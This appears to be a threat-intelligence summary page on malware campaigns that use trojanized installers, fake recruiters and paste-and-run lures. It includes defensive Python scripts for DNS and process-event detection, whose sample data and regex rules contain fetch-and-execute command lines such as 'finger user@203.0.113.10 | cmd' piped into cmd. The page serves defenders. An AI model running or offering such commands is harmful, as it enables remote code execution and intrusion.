Mallory

State-Linked Malware Campaigns Using Social Engineering and Trojanized Installers

Tags: trojanized installer, infostealer, social engineering, dll sideloading, compromised download, fake recruiter, lookalike domains, software developers, msi, espionage, decoy documents, javascript
Updated January 27, 2026 at 07:03 AM. 3 sources.

Multiple reports detailed state-linked intrusion activity relying on social engineering and trusted delivery mechanisms to gain initial access and establish remote control. Researchers reported a suspected state-affiliated espionage operation targeting government and financial organizations in Kazakhstan and Afghanistan, built around a previously unreported Windows DLL implant dubbed KazakRAT delivered via malicious MSI installers and decoy documents (e.g., a fake Kazakh presidential letter and an Afghan provincial memo). The malware was described as relatively unsophisticated—unencrypted HTTP beaconing and minimal obfuscation—yet capable of host reconnaissance, file search/exfiltration, and downloading/executing additional payloads, enabling long-running access since at least 2022.

Separately, Insikt Group described North Korean operators (tracked as PurpleBravo) running the “Contagious Interview” campaign, using fake recruiter personas and weaponized “coding tests” hosted on platforms like GitHub to trick software developers into executing malware on corporate devices, supporting software supply-chain targeting. The toolset reportedly includes BeaverTail (JavaScript infostealer) and newly identified RATs PylangGhost and GolangGhost. In another supply-chain style incident, Trend research and an Emurasoft advisory reported the official EmEditor download being tampered with to serve a trojanized MSI whose CustomAction launched PowerShell to fetch staged payloads from lookalike domains (e.g., EmEditorjp[.]com, EmEditorgb[.]com, EmEditorde[.]com), followed by environment fingerprinting and geofencing checks—highlighting ongoing risk from compromised public software distribution channels.
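The EmEditor incident above staged payloads on registrable domains that reuse the vendor's brand name with a country-style suffix appended. The following is an added example (not code from any of the cited reports or vendors) showing how a defender can refang the published indicators and flag both the known staging domains and other brand-token lookalikes in a DNS query log. It assumes that `emeditor.com` is the vendor's legitimate domain, and the log lines and the `emeditor-update.net` name are constructed for the example.

```python
import re
from typing import List, Optional, Tuple

# Staging domains as published (defanged) for the EmEditor incident.
DEFANGED_IOCS = ["EmEditorjp[.]com", "EmEditorgb[.]com", "EmEditorde[.]com"]

# Assumption: emeditor.com is the vendor's legitimate domain. Any other
# registrable domain whose first label carries the brand token is treated
# as a lookalike candidate worth a closer look.
LEGIT_DOMAINS = {"emeditor.com"}
BRAND_TOKEN = "emeditor"


def refang(ioc: str) -> str:
    """Turn a defanged indicator such as 'example[.]com' back into a hostname."""
    return ioc.strip().lower().replace("[.]", ".").replace("(.)", ".")


KNOWN_BAD = {refang(i) for i in DEFANGED_IOCS}


def registrable(host: str) -> str:
    """Naive eTLD+1 (last two labels); adequate for .com/.net-style suffixes."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def classify(host: str) -> Optional[str]:
    """Return a verdict for a queried name, or None when nothing is suspicious."""
    reg = registrable(host)
    if reg in LEGIT_DOMAINS:
        return None
    if reg in KNOWN_BAD:
        return "known_staging_domain"
    if BRAND_TOKEN in reg.split(".")[0]:
        return "brand_lookalike"
    return None


# Constructed DNS query log (not taken from any report): timestamp, host, queried name.
SAMPLE_DNS_LOG = """\
2026-01-27T09:12:01Z ws-finance-07 qname=www.emeditor.com
2026-01-27T09:12:04Z ws-finance-07 qname=emeditorjp.com
2026-01-27T09:15:30Z ws-dev-02 qname=cdn.emeditor-update.net
2026-01-27T09:16:11Z ws-dev-02 qname=github.com
"""

LINE_RX = re.compile(r"^(?P<ts>\S+)\s+(?P<host>\S+)\s+qname=(?P<qname>\S+)$")


def scan_dns_log(text: str) -> List[Tuple[str, str, str]]:
    """Yield (host, qname, verdict) for every log line that classify() flags."""
    findings = []
    for line in text.splitlines():
        m = LINE_RX.match(line)
        if not m:
            continue
        verdict = classify(m["qname"])
        if verdict:
            findings.append((m["host"], m["qname"], verdict))
    return findings


if __name__ == "__main__":
    for host, qname, verdict in scan_dns_log(SAMPLE_DNS_LOG):
        print(f"{host}: {qname} -> {verdict}")
```

The exact-match set catches the published indicators; the brand-token check is the piece that keeps working when the operator rotates to a fourth suffix the reports never listed, at the cost of some review effort on legitimate vendor mirrors or CDNs.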

Related Stories

Social-engineering malware campaigns delivering remote-access trojans and backdoors

Recent reporting highlights multiple **social-engineering-driven malware delivery** efforts that culminate in remote access and persistent compromise. In South Korea, attackers distributed **counterfeit adult games** via popular “webhard” file-sharing services; victims received a ZIP containing a decoy `Game.exe` launcher that stages additional components (`Data1.Pak`, `Data2.Pak`, `Data3.Pak`) and ultimately injects **QuasarRAT** (aka **xRAT**), enabling host profiling, keylogging, and unauthorized file transfer. The execution chain included masqueraded artifacts such as `GoogleUpdate.exe` and `WinUpdate.db`, with AES used to decrypt/extract shellcode prior to privilege escalation and RAT injection. Separately, a spear-phishing campaign weaponized news about a purported **Nicolás Maduro arrest** to deliver a **backdoor**: emails carried a ZIP with a lure executable (`Maduro to be taken to New York.exe`) alongside a malicious DLL (`kuguo.dll`) that abuses a legitimate KuGuo binary for execution. Post-run behavior included replication to `C:\ProgramData\Technology360NB`, persistence via an auto-start renamed binary (`DataTechnology.exe`), and C2 beaconing for tasking and configuration updates; researchers noted tradecraft consistent with **Mustang Panda** but said attribution was not yet confirmed. A separate research note described **GravityRAT** reemerging as a multi-platform RAT with expanded **Android** targeting (in addition to Windows/macOS), emphasizing mobile endpoints as increasingly high-value targets for data theft and persistent access, though it did not describe the same specific campaigns as the Windows-focused lures above.

2 months ago
Windows Malware Campaigns Using Social Engineering and Legitimate Platforms to Deliver RATs, Stealers, and Proxyware

Multiple research reports detailed **Windows-focused malware delivery chains** that rely on social engineering and abuse of legitimate services to blend into normal enterprise traffic. FortiGuard Labs described a **multi-stage campaign targeting users in Russia** that starts with business-themed decoy documents and scripts, then escalates to security-control bypass and surveillance before deploying **Amnesia RAT** and ultimately **ransomware** with widespread file encryption. A notable technique in that intrusion is the abuse of **Defendnot** (a Windows Security Center trust-model research tool) to **disable Microsoft Defender**, while payloads are hosted modularly across public cloud services (e.g., **GitHub** for scripts and **Dropbox** for binaries) to improve resilience and complicate takedowns. Separately, ReliaQuest reported attackers using **LinkedIn private messages** to build trust with targets and deliver a **WinRAR SFX** that triggers **DLL sideloading** via a legitimate PDF reader, then establishes persistence (Registry `Run` key) and executes **Base64-encoded shellcode in-memory** to load a RAT-like payload. Trend Micro and Koi Security documented **Evelyn Stealer**, which weaponizes **malicious VS Code extensions** to drop a downloader DLL (e.g., `Lightshot.dll`), run hidden PowerShell to fetch `runtime.exe`, and inject the stealer into `grpconv.exe`, exfiltrating data (credentials, cookies, wallets, screenshots, Wi‑Fi credentials) to `server09.mentality[.]cloud` over FTP. AhnLab ASEC also reported **proxyjacking** activity in South Korea attributed to **Larva‑25012**, distributing **proxyware disguised as a Notepad++ installer** and evolving evasion (e.g., injecting into Windows Explorer and using Python-based loaders) to monetize victims’ bandwidth via unauthorized proxyware installation.

1 month ago
Malware Delivery via Social Engineering: Phishing Lures, Fake Browser Alerts, and Paste-and-Run Payloads

Multiple threat reports describe **social-engineering-driven malware delivery** leading to remote access and follow-on payload deployment. Fortinet observed a **multi-stage phishing campaign targeting users in Russia** that delivers **Amnesia RAT** and ransomware via business-themed decoy documents and a malicious `.lnk` shortcut using a double extension (e.g., `*.txt.lnk`). The infection chain uses public cloud services for staging—**GitHub** for scripts and **Dropbox** for binary payloads—and abuses **defendnot** to trick Windows into believing a third-party AV is installed, effectively disabling **Microsoft Defender** before later-stage execution. Separately, Huntress attributed activity to **KongTuke**, which uses **malicious browser extensions** to display fake “browser crash” security alerts (“**CrashFix**”) that pressure users into running attacker-provided commands, and also deploys a Python RAT dubbed **ModeloRAT**. ModeloRAT is described as heavily obfuscated, using **Windows Registry** persistence and **RC4**-encrypted communications, with the ability to deliver additional payloads (DLLs, executables, scripts). Red Canary’s January intelligence update highlights **Scarlet Goldfinch** activity using **paste-and-run** lures and a notable technique of using the Windows `finger` client to pull remote content (e.g., `finger user@IP | cmd`), followed by `curl` download of an archive masquerading as a PDF and extraction via `tar -xf`, culminating in **Remcos** (and sometimes **NetSupport**) delivered via **DLL sideloading**.
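The Scarlet Goldfinch chain above (`finger user@IP | cmd`, a `curl` download named like a PDF, `tar -xf` extraction) and the double-extension `.txt.lnk` lure are all visible in process-creation telemetry. The following is an added example (not code from any of the cited reports or vendors) of rule logic a defender could run over such events; it also covers the MSI CustomAction-to-PowerShell parent/child relationship from the EmEditor incident described earlier on this page. The event records, IP addresses and file paths are constructed for the example.

```python
import re
from dataclasses import dataclass
from typing import List, Tuple


@dataclass
class ProcessEvent:
    parent: str   # parent image name, e.g. "explorer.exe"
    image: str    # image name of the newly created process
    cmdline: str  # full command line of the new process


# Command-line patterns for the tradecraft described in the reporting.
CMDLINE_RULES = {
    # finger client pulling remote content and piping it straight into cmd
    "finger_piped_to_cmd": re.compile(r"\bfinger(\.exe)?\s+\S+@\S+.*\|\s*cmd\b", re.I),
    # tar extracting an archive whose name masquerades as a PDF
    "tar_extract_fake_pdf": re.compile(r"\btar(\.exe)?\s+-xf\s+\"?\S+\.pdf\b", re.I),
    # double-extension shortcut such as report.txt.lnk
    "double_extension_lnk": re.compile(r"\.(txt|pdf|docx?|xlsx?)\.lnk\b", re.I),
}


def parent_child_rules(ev: ProcessEvent) -> List[str]:
    """Relationship rules that need parent and child, not just the command line."""
    hits = []
    # Windows Installer spawning PowerShell is what a malicious CustomAction looks like.
    if ev.parent.lower() == "msiexec.exe" and ev.image.lower() in ("powershell.exe", "pwsh.exe"):
        hits.append("msi_customaction_powershell")
    return hits


def detect(events: List[ProcessEvent]) -> List[Tuple[str, str]]:
    """Return (rule_name, cmdline) for every event that trips a rule."""
    findings = []
    for ev in events:
        for name, rx in CMDLINE_RULES.items():
            if rx.search(ev.cmdline):
                findings.append((name, ev.cmdline))
        for name in parent_child_rules(ev):
            findings.append((name, ev.cmdline))
    return findings


# Constructed sample events (TEST-NET addresses, placeholder paths); not real telemetry.
SAMPLE_EVENTS = [
    ProcessEvent("explorer.exe", "cmd.exe", "cmd.exe /c finger user@203.0.113.10 | cmd"),
    ProcessEvent("cmd.exe", "curl.exe", r"curl -o C:\Users\Public\report.pdf http://198.51.100.7/r"),
    ProcessEvent("cmd.exe", "tar.exe", r"tar -xf C:\Users\Public\report.pdf -C C:\Users\Public"),
    ProcessEvent("explorer.exe", "cmd.exe", r'"C:\Users\alice\Downloads\contract.txt.lnk"'),
    ProcessEvent("msiexec.exe", "powershell.exe",
                 'powershell.exe -WindowStyle Hidden -Command "<staged download placeholder>"'),
    ProcessEvent("explorer.exe", "notepad.exe", r"notepad.exe C:\notes.txt"),  # benign control
]


if __name__ == "__main__":
    for rule, cmd in detect(SAMPLE_EVENTS):
        print(f"[{rule}] {cmd}")
```

The `curl` step on its own is left unmatched on purpose: downloads are too common to alert on, and the signal in this chain is the later `tar -xf` on a file that is named as a document but handled as an archive. Correlating the two by working directory or by the downloaded path would tighten the rule further.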

1 month ago
